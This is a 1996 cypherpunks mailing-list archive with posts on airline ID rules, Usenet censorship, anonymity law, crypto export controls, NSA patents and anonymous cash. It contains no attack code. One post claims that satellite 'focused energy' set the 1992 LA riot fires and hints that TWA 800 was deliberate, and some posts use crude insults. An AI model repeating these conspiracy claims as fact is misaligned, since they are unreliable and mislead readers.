 
   "More in the Pipeline." 
 
      In the 1970s fear gripped the Western world that Earth 
      was running out of oil. Since then, vast new reserves 
      have been discovered that can be extracted with current 
      technology. The known crude oil reserve now amounts to 
      one trillion barrels -- enough for 45 to 50 years at 
      current world production rates, and estimated reserves 
      are at least one trillion barrels more. 
 
   ----- 
 
   http://jya.com/aspoil.txt  (6 kb for 2) 
 
   ASP_oil 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 8 Sep 1996 06:05:21 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: "The Bill of Rights can be dangerous...."
In-Reply-To: <4X1VTD27w165w@bwalk.dm.com>
Message-ID: <199609072038.PAA10538@homeport.org>
MIME-Version: 1.0
Content-Type: text


I got on four seperate airplanes with a work ID in late August.  All
you need to do is ask for the manager, and ask to see where in the
contract it says Goverment issued ID.

Air tickets come with about 300 pages of contract included by
reference.  No where in those contracts is anything about government
ID.  I was told once that it was a secret FAA regulation that I wasn't
allowed to see.  After I saw it the women got really adamant that I
couldn't see it in context, nor find out what regulation it was part
of. (I saw, but did not get to keep, about 12 lines of dot matrix
printed text on computer paper.)  The words to use to get on a plane
seem to be breach of contract, with managers.

Adam

Dr.Dimitri Vulis KOTM wrote:

| > "People moving around can be dangerous [avoiding parental responsibilities,
| > avoiding taxes, spying, plotting to bomb buildings]-- as can traceability,
| > especially in/by repressive regimes.  Therefore I would favor allowing
| > freedom of movement -- with some form of traceability only under terms
| > considerably stronger than what are generally required for a wiretap."

| Have you tried to get on an airplane lately? I just had to present my
| driver licence (work id w/ picture wouldn't cut it!) to get on. I
| understand John Gilmore got himself arrested for refusing to identify
| himself. As he said, there used to be a 200-year precedent that a
| citizen can travel within the country without having to identify
| himself. Shit, I used to fly under phoney names - can't do this anymore.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 8 Sep 1996 02:31:19 +0800
To: cypherpunks@toad.com
Subject: USF_avv   MS's Martha Stewart
Message-ID: <199609071543.PAA11548@pipe6.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


For MSerfs and groupies: 
 
 
A NYC local rag has a salacious article, "Microsoft's own Martha Stewart,"
on Michael Goff, the newly appointed editor of Cityscape, MS's upcoming
urban-slurp-fuck-and-vomit vanity. 
 
 
Excerpts: 
 
 
The key to why Bill Gates hired Mr. Goff may lie in the fact that Mr. Goff
is a marketing maniac, a self-confessed "media whore." 
 
 
"He became more of an egotistical asshole overnight than anyone I'd ever
seen when the magazine [Out] came out," said one prominent gay journalist
and acquaintance. 
 
 
Mr. Goff is indeed a family man, of sorts: He confirmed that he is
considering donating his services to two lesbian friends who want to raise
their own child. 
 
 
He bristled at being pigeonholed for being gay, rather than being
recognized for his creativity. "It has nothing to do with me being gay or
not," he said. "I've always been focused on doing mass consumer media."
Besides, he added, "They're not paying me like that. I don't have a jet or
anything." 
 
 
----- 
 
 
http://jya.com/usfavv.txt 
 
 
USF_avv




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Moe!" <moe-san@elcafe.com>
Date: Sun, 8 Sep 1996 00:51:37 +0800
To: Ulf Moeller <um@c2.net>
Subject: Re: ... subversive leftists
In-Reply-To: <m0uzED3-00009tC@ulf.mali.sub.org>
Message-ID: <32317F59.7E32@elcafe.com>
MIME-Version: 1.0
Content-Type: text/plain


Ulf Moeller wrote:
 
> Uh? Their sabotage "tutorial" is very careful about not causing
> danger to humans. Where did you see any "explosive-warning" signs?

Correct. One the one hand, they promote not to cause any harm to people.
On the other hand, check out the following: 

Inflamable sets:
http://www.serve.com/spg/154/96.html

Explosive warnings:
http://www.serve.com/spg/154/92.html

> As long as there is no English translation available, please be exact
> when posting excerpts.

I've tried to be as close as possible.
 
> Publishing texts doesn't destroy any railway signals. Some people
> do; and IMHO everyone must have the right to inform themselves
> how stupid those people are.

Agreed.

Cheers Moe!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sun, 8 Sep 1996 09:34:25 +0800
To: charlee@netnet.net>
Subject: Re: /\/\/\/\/HELP\/\/\/\/\  !!!!!!!!!
Message-ID: <199609072326.QAA14153@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About:  7 Sep 96 at 16:46, kickboxer wrote:

> I really need help unsubscribing from the Cypherpunks list! it is imperative!
>                                                                                

HA HA HA HA HA HA!!  That's soooo funny!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@interramp.com>
Date: Sun, 8 Sep 1996 07:12:05 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Court challenge to AOL junk-mail blocks
Message-ID: <1.5.4.32.19960907204437.0068b4d8@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:27 PM 9/7/96 -0700, Declan McCullagh wrote:
>If AOL wants to stop spammers, let them. They have every right to do so as
>long as their agreement with their customers permits it. It's a matter of
>contract law between AOL and its customers and should not involve the
>spammers and a lawsuit brought by the spammers.
>
>It seems as though the judge was snookered by the spammers' claim of U.S. 
>Mail-like service, free speech, blah. The right to free speech does 
>extend to corporations; in that way, it includes the right *not* to speak.
>

Declan raises a good point. But I'm guessing it's a bit more complex than
that.  CyberPromo and AOL lawyers tell me the court slapped down AOL simply
to "keep the status quo." Both sides used those very words, in fact. 

What's more, CyberPromo talks a good game on the First Amendment, but used
computer fraud and unfair competition statutes - not the Bill of Rights - in
its original filing against AOL. So what's going on?

It seems Weiner is  _very_ aware that this case deals with things never
before argued in court. No one has really sorted out just how much e-mail -
if any - an ISP is obligated to carry against its wishes. What Weiner
decides this fall may not set the kind of precendent that the case of the
Pentagon Papers did, but will be important for a while at least. 

Will
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMjIIw0cByjT5n+LZAQFNWgf/Xb+yG9JDVZ6MN1Hz/K4IUCXL8hSgjeG3
+Ih+aXiod/vVAHXCJmktvBJFWWAJjpFjW/0WQljvsMULxXYpdXAYFDh4kiZZg4A3
7xkjCsT+Kpi8lDCRmFPciQfvoLyiEJxr8hI2l2qucE0THV0spysTKpgYueggLZI6
no5mC47ZGusfL9jWb7qrnbqjO1h+0mVZYgr0GRY8MVvyMsJGgylEDaiCh0KSaI1V
TqEfTF+kcbzqtht0yG/M+QmCRertH4s1y9IWllWvJLMbAfwgFCxgGtamWoyXiHye
keXAGLK0r2u8vTfwK5rJ91ZR774CGkZHulNi3wx53pZaFyYPJtYizA==
=KS50
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kickboxer <charlee@netnet.net>
Date: Sun, 8 Sep 1996 07:54:40 +0800
To: cypherpunks@toad.com
Subject: /\/\/\/\/HELP\/\/\/\/\  !!!!!!!!!
Message-ID: <199609072146.QAA16610@netnet1.netnet.net>
MIME-Version: 1.0
Content-Type: text/plain


I really need help unsubscribing from the Cypherpunks list! it is imperative!
                                                                               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Sun, 8 Sep 1996 07:51:00 +0800
To: "John F. Fricker" <jfricker@vertexgroup.com>
Subject: Re: What the NSA is patenting
In-Reply-To: <2.2.32.19960907212748.00ada824@vertexgroup.com>
Message-ID: <3231EFAB.1A24@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


John F. Fricker wrote:
> 
> This excerpt from a Wired article/interview
> http://www.hotwired.com/wired/3.10/departments/electrosphere/data.html
> 
> "No data is totally safe," says Sharp ...

That entire article struck me as a load of hogwash the first time I
read it.  This Sharp dude rehashed several old fairy tales about
data recovery.

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Sun, 8 Sep 1996 07:19:15 +0800
To: cypherpunks@toad.com
Subject: Deleted Message (fwd)
Message-ID: <Pine.BSI.3.91.960907165810.6190A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



One must wonder about these military types.

Hm...

-millie

---------- Forwarded message ----------
Date: Sat, 7 Sep 96 16:50:21 -24000
From: MAILER-DAEMON@mqg-smtp3.usmc.mil
To: pstira@escape.com
Subject: Deleted Message

To:           "Gary Howland" <gary@systemics.com>
From:         MQG-SMTP3@USMC_MASTERINET@Servers[<pstira@escape.com>]
Subject:      Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
 Message in Transport deleted by:    
	ADMINISTRATOR@USMC_MASTERINET@Servers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 8 Sep 1996 03:53:55 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [RANT] Death of Usenet: Film at 11
Message-ID: <199609071720.LAA29986@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In Cypherpunks, on 08/19/96 
   at 01:34 PM, mpd@netcom.com (Mike Duvos) said:

=If Singapore bans alt.sex.hooters, you could simply post to
=alt.culture.singapore.i.got.your.hooters.right.here. 
    [snip]

=It would also send the correct message that "newsgroups" are simply
=one of many labels on an article, and are not cyberspacial tearooms
=where bad people congregate and there is guilt by association.

        I don't fault your argument on "sending the correct message," 
    but since when has an oppressive government ever been 
    concerned with "the correct message?"   LEA's could care less 
    about the message; their only interest is another opportunity to 
    behave like the jack-booted thugs they generally are.
    
        but public opinion, certainly the government interests in 
    control, have already determined in the court of small minds 
    that "we" are inherently evil (and beyond redemption without 
    coercion).  A repressive government can not afford publications 
    from unredeemed (and unrepentant) cyber-anarchists with a 
    world wide audience. 

        Is the daily comics the last refuge of freedom; witness 
    today's "Thatch:"

                "cubicle cliches are one of the few things we 
            all share; they're one of the few things that unite 
            us as americans!"

                "that and utter, corrosive contempt for our 
            elected officials."

        sarcasm has always been a potent weapon, and one of the 
    hardest to silence. ..in bits and pieces it can slowly undermine
    the target.  why is it tolerated?  I'm sure our malicious uncle 
    wanted to shut Doonsbury down during Vietnam, but 
    joe-six-pack rarely understood the underlying message.

=The alternative to doing something reasonable like this is probably
=to see mass migration from "banned newsgroups" to off-topic groups,
=like Lolita pictures in rec.pets.cats, when the inevitable crackdown
=comes.

        has not the crackdown arrived?  and are not the various 
    skirmishes between governments on one side and the ISPs & 
    users on the other sufficient evidence of governmental 
    intentions?

=As long as people can post
=anonymously, they will simply switch to another existing newsgroup
=when the one they are posting to becomes blocked. Once the =inevitable reciprocal pissing contest between posters and censors 
=gets going, Usenet as we know it will likely be destroyed.

        let's put it this way, the first reaction will be to 
    "eliminate" the anonymous remailers, then ban the "alt" 
    groups which can be created at will.  

        if there is migration from alt.sex.binaries to rec.cats, the 
    government will eliminate the entire usenet and we will be 
    forced back to the NWO controlled media conglomerates, 

        or mail lists.  of course, then the fascists will block or 
    close down the list servers on some flimsy pretext such as
    violating the US postal monopoly and regulations....  

        Many companies block the alt groups; 15 years ago, 
    even I blocked the alt groups during business hours (and 
    usenet was only 1.5 MBytes per day then!), restoring them 
    at 1800. 

        --why?  because the office staff spent *at least* all 
    morning reading usenet,  occasionally even refusing to 
    talk to customers before their daily dose!

        My point is simple:  I reacted by limiting the **time**
    of access, ** not access itself. **  

        On the other side, Reed, Buchannan &c. have decided
    *they* should judge what is fit (G rated) for our consumption; 

        and, of course, Big Brother has determined they should
    be the judge of political correctness and all that shit which is    

    numbing the minds of joe-six-pack until America is a 
    controllable homogeneous bowl of putrid gruel.

        government, in and of itself, may be able to selectively
    prosecute cyberspace "violaters," but the real danger is big 
    business.  Print newspapers receive $64 billion in ad revenue, 
    80% of which is local. Virtually every major US newspaper 
    (most owned by the group of 5) has a net presence --some 
    very informative.  And, even Mexico has more than a dozen 
    of their papers on line.

        However, in the US the news is still the same collection of
    what the NWO wants us to hear/see. So far, the foreign 
    press is not so inhibited and is often openly critical of 
    US bumbling in foreign affairs, Bubba's alleged (alledged?) 
    cocaine habit and criminal behaviour, --likewise critical of all
    fools.

        Where does this lead?  Well, we've probably peaked on 
    freedom; the rest is downhill as our "non-elected" government 
    degenerates to deploying more and more thought control to 
    maintain the oligarchic fascist form of what Jefferson thought 
    they were creating as a representative republic.

        I for one enjoy tweaking their nose, but it only stiffens 
    their resolve to squash me/us/whatever. 

        How do you show resolve without being in their face?   
    most regulation is created to "eliminate" abuse of a "public" 
    privilege; unfortunately, we all suffer "collateral damage" 
    to use their term.  

        does voluntary compliance work? unfortunately, no.

        where does that leave us?  confrontation, I guess. 
    preserve our advantage as long as we can.  we all know 
    from münchen that Clement Atlee made a fool of himself 
    appeasing Hitler for a false peace.
  
        might as well carry on with what we do best:

            rape, pillage, and burn... a scorched earth policy....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Sun, 8 Sep 1996 07:31:57 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: Anonymity and free speech
In-Reply-To: <1.5.4.16.19960903035433.37773f1a@mail.io.com>
Message-ID: <Pine.SUN.3.95.960907172555.29591M-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain



Interested readers are invited to see that the issues are complex by
looking at :
http://www.law.miami.edu/~froomkin/articles/oceanno.htm


On Mon, 2 Sep 1996, Greg Broiles wrote:

> 
> Instead of discussing whether or not Esther Dyson or other EFF board members
> are personally comfortable with anonymity, let's talk about whether or not
> the EFF and its board members believe that the First Amendment provides a
> right to speak and associate anonymously. (I believe that the First
> Amendment gives everyone the right to wear a t-shirt which says "I am an
> asshole." But I have no interest in wearing such a t-shirt. And so on.) 
> 
> I believe that it does, and that the Supreme Court has already made that
> clear. In cypherpunks@toad.comparticular, I'm thinking of _NAACP v. Alabama
> ex rel Patterson_, _Talley_, and _McIntrye v. Ohio Elections Commission_.
> (Sorry for the lack of cites; 95% of my stuff is still in boxes and I'm
> sending this via laptop and a Ricochet modem.)
> 
> If the right to speak/associate in "real life" is protected by the First
> Amendment, I don't see why it wouldn't be on computers and networks which
> are located inside the United States. And if that right is based upon the
> Constitution, it will take a constitutional amendment or a big sea change in
> the Supreme Court to take it away.
> (I wonder if the decision in _McIntrye_ would have gone the other way if Ms.
> McIntrye were selling drugs via anonymous message pools instead of
> discussing school funding via windshield flyers.) Discussions about the
> utility of anonymity would be more useful if we were designing a
> communication system or a constituion from scratch; but that's not our
> current situation. Is there serious debate about whether or not the
> Constitution and the Internet allow anonymous communication? (I'm not asking
> a rhetorical question. If someone's familiar with an argument to the
> contrary, please tell me about it.) Both the Constitution and the Internet
> are difficult to modify quickly; we probably have anonymity (like it or not)
> for at least a few more years. 
> 
> (I'm not trying to imply that US law is the only law, or that the rest of
> the world doesn't existy. But I don't know poo about the right to anonymity
> in other nations; and to a certain extent anonymity anywhere on the Internet
> is the same as anonymity everywhere on the Internet. Are other readers aware
> of other jurisdictions where anonymous speech is considered a right?)
>  
> ----
> Greg Broiles
> gbroiles@netbox.com
> http://www.io.com/~gbroiles
> 

[This message may have been dictated with Dragon Dictate 2.01. 
Please be alert for unintentional word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And #@&*! humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Sun, 8 Sep 1996 08:04:11 +0800
To: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Subject: Re: rc2 export limits..
In-Reply-To: <Pine.OSF.3.91.960905084320.30700A-100000@fn3.freenet.tlh.fl.us>
Message-ID: <Pine.SUN.3.95.960907173137.29591P-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


isn't this what Bernstein's program that is the subject of a lawsuit in
california does?

On Thu, 5 Sep 1996, P. J. Ponder wrote:

> 
> keywords:  ITAR, SHA, beneficial and innocuous crypto
> 
> The persistent reputation known as Bill Stewart wrote:
> 
> >Date: Wed, 04 Sep 1996 23:09:17 -0700
> >From: Bill Stewart <stewarts@ix.netcom.com>
> >To: Kent Briggs <72124.3234@compuserve.com>
> >Cc: cypherpunks@toad.com
> >Subject: Re: rc2 export limits..
> >
> >I'm afraid my source is "Read it on the net and was surprised to hear it".
> >My assumption is that the limit is for software that implements
> >both signature and verification, since ITAR doesn't ban export of
> >pure-authentication software.
> 
> The FIPS Pub (?180? ?181?) for the Secure Hash Algorithm (SHA) states in 
> the fine print at the beginning that SHA is export controlled.  I don't 
> have the document to refer to right now, but it plainly states that SHA  
> falls under ITAR.  As a cryptographic hash function, why would it be 
> controlled in this way?
> 
> How can I use SHA to encrypt something for someone else to decrypt?  I 
> know how to use it for authentication; am I missing something here?
> 
> ANFSCD:
> 
> I tried that OnNet32 e-mail software from FTP software.  It runs under 
> Windows95.  It is a lot of material to download, and way too intrusive to 
> install.  It wants to metastasize itself into the innards of Microsoft 
> Exchange and Inboxes, etc.  What is it with all this complexity anyway?  
> Why not just have a POP client that will check mail on the server?
> 
> It also wants you to store your mailbox password in it, as opposed to 
> letting you enter it on a session-by-session basis.  I don't like that.
> 
> sticking with PINE, PGP, and Xywrite II for now.... 
> 

[This message may have been dictated with Dragon Dictate 2.01. 
Please be alert for unintentional word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U.. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And #@&*! humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 8 Sep 1996 04:15:07 +0800
To: tcmay <tcmay@got.net>
Subject: Choice of Words
Message-ID: <199609071742.LAA00692@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


> --Tim May, who hopes he is never identified as the "John Doe"
indicted, > tried, convicted, and sentenced in 1979 in Washington
County, Oregon, for > the crime of unlawful foddering in a public
place. >
    foddering?  why, are you an indiscreet luncher?
 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't
allowed >
---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital
money, > tcmay@got.net  408-728-0152 | anonymous networks, digital
pseudonyms, zero > W.A.S.T.E.: Corralitos, CA  | knowledge,
reputations, information markets, > Licensed Ontologist         |
black markets, collapse of governments. > "National borders aren't
even speed bumps on the information superhighway."


--
one of the few things we all share: 
  the utter, corrosive contempt for our elected officials.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sat, 7 Sep 1996 16:08:06 +0800
To: schneier@counterpane.com
Subject: Re: What the NSA is patenting
Message-ID: <84207495027763@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


>(Used to be they just kept stuff secret; now they patent some of it.)
>
>United States Patent                   Patent Number:  5264794
>                                       Date of Patent: 23 Nov 1993
>
>Method of measuring magnetic fields on magnetically recorded media using a
>scanning tunneling microscope and magnetic probe
>
>Inventor(s):  Burke, Edward R., Silver Spring, MD, United States
>              Mayergoyz, Isaak D., Rockville, MD, United States
>              Adly, Amr A., Hyattsville, MD, United States
>              Gomez, Romel D., Beltsville, MD, United States
>Assignee:     The United States of America as represented by the Director,
>              National Security Agency, Washington, DC, United
>              States (U.S. government)
 
That isn't NSA research, it was merely sponsored by the NSA.  Those are all
university people who have published their work on MFSTM in journals, papers,
and theses (I used some of it in my paper at the Usenix Security Symposium, and
two of the images in my talk were provided by one of Mel Gomez' students). 
What the NSA is doing in this area is still classified (although I suspect the
techology isn't much different from what's publicly available), in this case
all they were doing was protecting their investment (just like the various PKC
patents originally assigned to universities).
 
Peter.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Sun, 8 Sep 1996 11:17:44 +0800
To: cypherpunks@toad.com
Subject: Re: What the NSA is patenting
Message-ID: <2.2.32.19960908005316.00af91b4@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:56 PM 9/7/96 -0500, you wrote:
>John F. Fricker wrote:
>> 
>> This excerpt from a Wired article/interview
>> http://www.hotwired.com/wired/3.10/departments/electrosphere/data.html
>> 
>> "No data is totally safe," says Sharp ...
>
>That entire article struck me as a load of hogwash the first time I
>read it.  This Sharp dude rehashed several old fairy tales about
>data recovery.
>

Actually Sharp appears only in that one quote. The article is poorly
editted. The rest of the article quotes some other data recovery experts and
"Sharp" is never mentioned again.

It's fun to debunk journalists but it takes more than saying "it's bunk".

--j





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 9 Sep 1996 02:44:58 +0800
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: Encourage Singapore To Come Out Of the Stone Age
Message-ID: <199609081635.JAA05916@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:39 PM 9/3/96 +0800, Enzo Michelangeli wrote:
> The idea that rights and values can be "natural" is contradicted by
> several thousand years of history, during which absolutism or downright
> tyranny have been well more common than freedom. 

The existence of foot binding in China is not evidence that women's 
feet have no particular natural shape.

> The success of that misleading view in America, and by extension in most
> of the western countries, is largely due to the unfortunate influence of
> [...]

When one engineers bridge, designed according to one theory of 
materials physics, stands up, and another engineers bridge, designed
according to a different theory of material physics, falls
down, does that not suggest that the first engineer knows 
what he is talking about, and the second engineer does not?

> In the real world, freedom is a by-product of a materially prosperous
> society (which is why capitalism generally produces free societies, but
> socialism does not).

First, you have this completely the wrong way around:  Prosperity is
the product of a free society.  For example when the Dutch revolted
from Spain, they were at first poorer than spain.

Secondly there is ample counter evidence:  For example in America
before the european conquest, some Indian societies were extremely
free and others, such as the Incas, had institutions very similar to 
modern totalitarianism, yet their material level was very different 
to today's, and not very different from each others.

Again the Germanic tribes that conquered England had very high levels
of liberty, yet were terribly poor, and the Icelanders of Saga period
Iceland were very free, yet very poor.

> Trying to build a free society by screaming loud
> what the "natural" rights are supposed to be, has no better chances of
> success than [...]

Succeeded the last two times it was tried.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Sun, 8 Sep 1996 11:41:10 +0800
To: cypherpunks@toad.com
Subject: Re: Deleted Message
Message-ID: <2.2.32.19960908012312.00b0b0b8@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


I wonder what I said?


At 08:41 PM 9/7/96 -24000, you wrote:
>To:           <cypherpunks@toad.com>
>From:         MQG-SMTP3@USMC_MASTERINET@Servers[<jfricker@vertexgroup.com>]
>Subject:      Re: Mail OnNet
> Message in Transport deleted by:    
>	ADMINISTRATOR@USMC_MASTERINET@Servers
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sun, 8 Sep 1996 09:16:03 +0800
To: cypherpunks@toad.com
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <50fonn$mta@life.ai.mit.edu>
Message-ID: <3231FB72.167E@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Gilmore wrote:

> PS: I would counsel against the kind of false anonymity provided by
> the Finnish server, though.  Providing information under the promise
> that it will "never be revealed or misused" is a lot more dangerous
> than never providing it at all.  E.g. "Anonymous cash" that is really
> based on dossiers or account-numbers isn't anonymous at all.  Even
> physical cash is getting easier to trace; the British government has
> been tracking money by serial numbers for years, with custom machines
> in the banks, to de-anonymize Irish freedom-fighters (oops, I mean
> terrorists).  Anonymity is another area, like privacy, where changes
> from technology can make big social differences.


There is a massive difference between anonymous speech and anonymous
transactions. Anonymous speech can create problems (defamation etc.)
but in the main these are not problems the courts are particularly
good at dealing with. In the UK the libel laws are not so much a redress
for legitimate grievance than a way for a senior Tory to obtain a nice
lump sum towards his pension if he should happen to be filmed handing
over 5000 quid in a breifcase to a prostitute he'd never met.

The "problems" encountered by the Church of Scientology demonstrate that
the court process itself can be imeasurably more harmfull than any
imagined grievance. Should society have laws to protect trades secrets?
Probably , but not to protect the likes of the CoS. If the Internet
makes such laws difficult to enforce then we should return to the
original concerns that prompted society to create the laws in the first
place and see if the Internet provides better was of achieving the same
result.

Anonymous transactions are a rather different matter. It is more
difficult to argue for anonymity. The extreeme examples of Chaumian cash
create considerable difficulties such as making a perfect conduit for
ransom proceeds and the profits of drug trafficing. Simply ignoring
these problems will result in the proponents of anonymity simply being
ignored.

The principle fear of the authorities appears to be terrorist rather
than normal criminal activities. Terrorism is no longer limited to far
off irredentist struggles that ex-patriates can harbour romantic
thoughts about. The reality the the IRA is an organisation that murders
children by placing a bomb in a rubbish bin outside a MacDonalds has
been brought home to the suporters of Noraid through the bombings of the
World Trade Center, Oaklahoma and Atlanta. If one lives in a country
where there is little terrorism it is easy to imagine that people driven
to extreeme actions are driven by a extreeme situation. If one is faced
with the reality of terrorism one soon reaches the conclusion that its
perpetrators are simply ordinary psychopaths.

Having stated that terrorism is an important concern for the state it is
necessary to ask whether it is necessary to restrict freedom to combat
terrorism. In answering one must bear in mind that a central part of
most terrorist strategies is to force the state to respond with
disproportionate measures (here recent events in Chetchnya indicate that
Trotsky was not widely read in the USSR). 

Absolutely anonymous cash may create problems, but what if it were
possible to generate small quantities of "marked bills" within an
otherwise anonymous system. If the circumstances under which the marked
bills could be distributed were limited to a small set of tightly
controlled circumstances the legitimate need of the government to oppose
terrorism and organised crime could be met without imposing a Singapore
style system with total monitoring.

In effect what is taking place is a negotiation between two groups, the
government and civil rights activists. If one side refuses to consider
the needs of the other they will be marginalised. Absolutism in politics
is usually a bad thing. Politics usually works through compromises. The
art being to ensure that one compromises the inessential terms in order
to defend the key items.

In the present Presidential race the one policy area in which Clinton is
potentially vulnerable is privacy. Its the one area which the
Republicans could raise and claim it as their own (whether justifiable
or not). The Clinton camp could not move from their current position
without dropping Freeh overboard, since Freeh has run the FBI without
any Ruby ridge or Waco style cockups on his watch I don't think that is
likely to happen. If privacy is raised as a policy concern in this
election it will reoccur in the next and both parties will have to
justify their policies in terms of personal privacy as well as
everything else.

Just because the election is practically settled does not mean that the
campaign will not affect what happens during the administration. Clinton
clearly wants Gore to be his successor and is going to want to make it
as easy as possible for him to win. Clinton is the kind of politician I
can trust - give him an issue and I trust him to look at the opinion
polls. If Dole makes any kind of headway in '96 with a privacy plank
then Gore will have to have one in 2000.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 8 Sep 1996 12:13:08 +0800
To: "<pstira@escape.com>
Subject: Re: TWA 800 - Friendly Fire?
Message-ID: <323227A1.C1B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


<pstira@escape.com> wrote:
> The one thing I have been thinking about, since the very beginning, is 
> am I the only person who feels this might have been somewhat less than
> unintentional?  It sure would be easy to take those rights away if
> everyone is afraid for their "lives"...
> Look at what has been happening in the news lately, and look at how 
> much is "unexplained" or flimsy evidencially speaking, in the very 
> least.
> If, for instance, the government wanted to cut down on civil
> liberties/civil rights, it would seem MIGHTY CONVENIENT that so much 
> is "accidentally" happening so close together.
> Ditto with the Olympics thing.
> I vote something is QUITE fishy, and I guess I hope I'm not the only 
> one paranoid enough to feel the same.

Sure something's fishy. Look at the technological capabilities they
have, and we're not keeping up with them. One example:

L.A. riots, 1992. 6,500 or so fires, unknown arsonist(s). But very
convenient for clearing certain properties if you're putting in a new
freeway or subway tunnel, and you don't want to have to fight with all
the riffraff who might be resistant to getting up and moving.

So how do you light all those fires? Do it the hard way - plant the
stuff (6,000-plus times!) and hope nobody catches your guys, or light
'em up from satellites, using "new experimental" focused energy. Gosh,
Mr. Bill, would they do that? Guess it depends on what you're willing to
believe. Remember what Tom Wolfe wrote about? "The reason the folks on
the East Coast (circa 1700's) were such easy victims for the pirates was
the fact that they couldn't comprehend just how vicious and ruthless the
pirates really were." (quote approximate).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Sun, 8 Sep 1996 13:32:21 +0800
To: cypherpunks@toad.com
Subject: Re: MUD anyone?
In-Reply-To: <Pine.3.89.9609010948.I361-0100000@pegasus.unicorn.com>
Message-ID: <9609080251.AA22510@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


Mark Grant wrote:
> On Tue, 27 Aug 1996, Jon Leonard wrote:
> 
> > I've been planning to run a MUD like that, at mud.umop-ap.com port 2121.
> > I just don't have enough coded to be worth announcing yet.
> 
> Cool. What's it running under? I was planning to base it around the latest
> version of the Nightmare library for MudOS, which I just downloaded. If I
